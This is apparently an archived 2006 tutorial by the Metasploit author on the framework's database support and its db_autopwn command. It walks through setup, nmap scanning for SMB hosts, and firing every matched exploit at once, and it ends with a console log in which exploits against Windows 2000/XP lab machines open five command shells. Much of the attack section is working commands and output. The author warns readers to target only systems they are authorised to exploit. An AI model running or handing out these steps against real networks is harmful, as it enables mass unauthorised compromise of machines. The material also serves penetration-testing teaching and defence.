[ Metasploit 3.0 Automated Exploitation ]
H D Moore <hdm[at]metasploit.com>
Original version:
http://metasploit.blogspot.com/2006/09/metasploit-30-automated-exploitation.html
A recurring theme in my presentations about Metasploit 3.0 is the need for
exploit automation. As of tonight, we finally have enough code completed
to give a quick demonstration :-)
Metasploit 3 uses the ActiveRecord module (part of RoR) to provide an
object-oriented interface to an arbitrary database service. Database
support is enabled by installing RubyGems, ActiveRecord ("gem install
activerecord"), and a database-specific driver ("gem install [ postgresql
| sqlite3 | mysql | etc ]"). Once these components have been installed,
you will need to load the appropriate plugin from the msfconsole
interface for the database that you want to use. The completed plugins
include db_postgres, db_sqlite3, and db_sqlite2.
For this example, we will use the PostgreSQL database server on a Gentoo
Linux system. While the SQLite database support is functional,
performance problems will prevent it from being useful for performing
large-scale exploit automation.
You will need a recent version of Ruby (1.8.4+ works nicely), a recent
version of PostgreSQL, and a Subversion client for downloading the
Metasploit source code. Once these are in place, you need to verify that
RubyGems is also installed. If the gem command is not in your path, you
will need to install RubyGems. On Gentoo, the command emerge rubygems
will build and install this package. Once RubyGems is installed, you need
to use the gem command to install ActiveRecord and the PostgreSQL driver
for Ruby. This can be accomplished with the commands gem install
activerecord and gem install postgres. To verify your installation, run
the following command, which should produce no output or errors: ruby -e
'require "rubygems"; require_gem "postgres";'
Once the prerequisites are in place, you need to create a PostgreSQL
instance. If you already have a PostgreSQL server running, you can skip
this step. To create a new database instance, run the following commands:
$ initdb ~/metasploitdb
$ pg_ctl -D ~/metasploitdb start
Finally, you need to grab the latest copy of the Metasploit Framework
source from the public Subversion tree:
$ svn checkout http://metasploit.com/svn/framework3/trunk/ framework3
To obtain the latest updates in the future, just change into the
framework3 directory and execute svn update.
Change into the framework3 directory and execute ./msfconsole. You may see
a few warning messages about broken modules that you can safely ignore,
but eventually you should be looking at a msf> prompt. Load the
PostgreSQL driver plugin using the following command:
msf > load db_postgres
Once the plugin loads, type the help command and look at the new options
listed under the Postgres Database section. Since we do not have an
existing database, we want to use the db_create command. If you created
the PostgreSQL instance using the commands above, this should result in
various NOTICE and ERROR messages as it loads the schema into the default
database name (metasploit3). If you are using an existing PostgreSQL
instance, you will need to pass the appropriate parameters to the
db_create command (see the help output for more information).
Now that the console is connected to a new database instance, a new set of
console commands become available. These are listed in the help output
under the Database Backend section. To verify that the database
connection is valid, execute the db_hosts command. If everything worked,
there should be no results and no errors listed. If you receive a error
message and a backtrace, use the db_disconnect command and try executing
db_create again with different parameters.
The console is connected to the database, the schema is in place, you are
now ready to import vulnerability data. The current version of the
framework supports Nessus NBE output files, Nmap XML output files, and a
wrapper command (db_nmap) that will launch the nmap port scanner and
record the results into the attached database.
Before you start loading data, take a quick look at the db_autopwn
command. If you run this command without any parameters, it should result
in a blob of text like the following:
msf > db_autopwn
[*] Usage: db_autopwn [options]
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port
-h Display this help text
The db_autopwn command is where the exploitation magic happens. This
command will scan through the database tables and create a list of
modules that match up to specific vulnerabilities. This matching process
can happen in two different ways. The first method involves analyzing the
list of vulnerability references for every exploit and matching them up
with the references in every imported vulnerability record. This
cross-referencing method is fairly accurate and depends on standard
identifiers, such as OSVDB, Bugtraq, and CVE to match exploits with their
targets. The second method uses the default port associated with each
exploit module to locate targets running the same service. While this
will work in most cases, it can cause a fair amount of collateral damage
and is likely to miss vulnerabile services running on non-default ports.
At this point, you have a few options. You can either import an existing
Nessus NBE file using the db_import_nessus_nbe command, import an
existing Nmap XML output file using the db_import_nmap_xml command, or
use the db_nmap command to populate the database. The benefit of using a
Nessus NBE file is that it provides data for the cross-referencing mode
(-x) of db_autopwn. The benefit of using Nmap data is that you can
quickly attack a large group of systems without having to run a complete
vulnerability scan, but you will miss vulnerabilities that are not on the
default port of the associated Metasploit module.
Please keep in mind is that the db_autopwn command will treat ALL of the
records in the database as potential targets. Future versions of the
framework will include the ability to limit the targets to a specific set
of the entire database. Until this change occurs, be really careful about
what data you feed to the framework.Do NOT import anything into the
database that you are not allowed to exploit.
For the first attempt, try using the db_nmap command to identify all
Windows 2000 and Windows XP systems on the local network, that expose the
SMB service.
msf > db_nmap -p 445 [target]
Replace the [target] string with the network block of your local subnet or
the IP address of a specific target system that you want to test. This
command will use the Nmap port scanner to find systems with port 445
exposed. Once this command completes, use the db_services command to view
the results. If not hosts were found with port 445 open, no results will
be displayed by the db_services command.
Assuming that you found at least one system with port 445 open, its time
to run the db_autopwn command and see what modules it will launch.
Execute the following command from the console prompt:
msf > db_autopwn -p -t
The -t flag tells the command to display all the match results and the -p
flag indicates that port-based matching should be used to locate
potential targets. This command should show a handful of exploits and one
or two auxiliary modules for every system that was found with port 445
open. Don't worry about the auxiliary modules for now, as they are
disabled by default and need to be manually enabled. This is your last
chance to verify that every host in the target list is valid and that
exploiting (or crashing) these systems won't result in your incarceration
or lack of employment.
Time for the fun part! Execute the db_autopwn command again, this time
adding the -e flag. This will result in every one of those modules being
launched against their specified target. The default payload is a generic
bind shell, using a randomized port number for each attempt. Wait for
this command to complete and then execute the sessions -l command to view
the results. If any of those target systems were vulnerable, you should
see at least one command shell. To interact with these shells, use the
sessions -i [ID]. To detach from a shell, use control+Z, and to kill a
shell, use control+C.
Thats it for the basics. To expand the scope of the test, widen the port
range for the db_nmap command or import a Nessus NBE file. If the command
finishes, but exploits are still running, you can use the jobs command to
kill off any stragglers.
The log below is a result of my own testing against a local network full
of vulnerable virtual machines.
Enjoy!
-HD
$ ./msfconsole
=[ msf v3.0-beta-2-svn
+ -- --=[ 102 exploits - 93 payloads
+ -- --=[ 17 encoders - 4 nops
=[ 13 aux
msf > load db_postgres
[*] Successfully loaded plugin: db_postgres
msf > db_create
dropdb: database removal failed: ERROR: database "metasploit3" does not
exist
CREATE DATABASE
ERROR: table "hosts" does not exist
[ snip ]
msf > db_nmap -p 445 192.168.0.0/24
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-09-17 22:49
CDT
Interesting ports on destructo (192.168.0.2):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WIN2000DB.lan (192.168.0.106):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WINXPSP0.lan (192.168.0.108):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WIN2000SP4.lan (192.168.0.139):
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap finished: 256 IP addresses (8 hosts up) scanned in 12.493 seconds
msf > db_services
[*] Service: host=192.168.0.2 port=445 proto=tcp state=up
name=microsoft-ds
[*] Service: host=192.168.0.106 port=445 proto=tcp state=up
name=microsoft-ds
[*] Service: host=192.168.0.108 port=445 proto=tcp state=up
name=microsoft-ds
[*] Service: host=192.168.0.139 port=445 proto=tcp state=up
name=microsoft-ds
msf > db_autopwn -p -t -e
[*] Analysis completed in 0.208992004394531 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against
192.168.0.106:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against
192.168.0.108:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against
192.168.0.2:445...
[ snip ]
[*] Calling the vulnerable function...
[*] Calling the vulnerable function...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Bound to
6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.0.139
[\BROWSER] ...
[*] Building the stub data...
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 4 opened (192.168.0.145:60778 ->
192.168.0.139:26188)
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 5 opened (192.168.0.145:47380 ->
192.168.0.106:27700)
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.0.145:46858 -> 192.168.0.139:15441
2 Command shell 192.168.0.145:42700 -> 192.168.0.108:28199
3 Command shell 192.168.0.145:40966 -> 192.168.0.106:27915
4 Command shell 192.168.0.145:60778 -> 192.168.0.139:26188
5 Command shell 192.168.0.145:47380 -> 192.168.0.106:27700
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
# milw0rm.com [2006-09-18]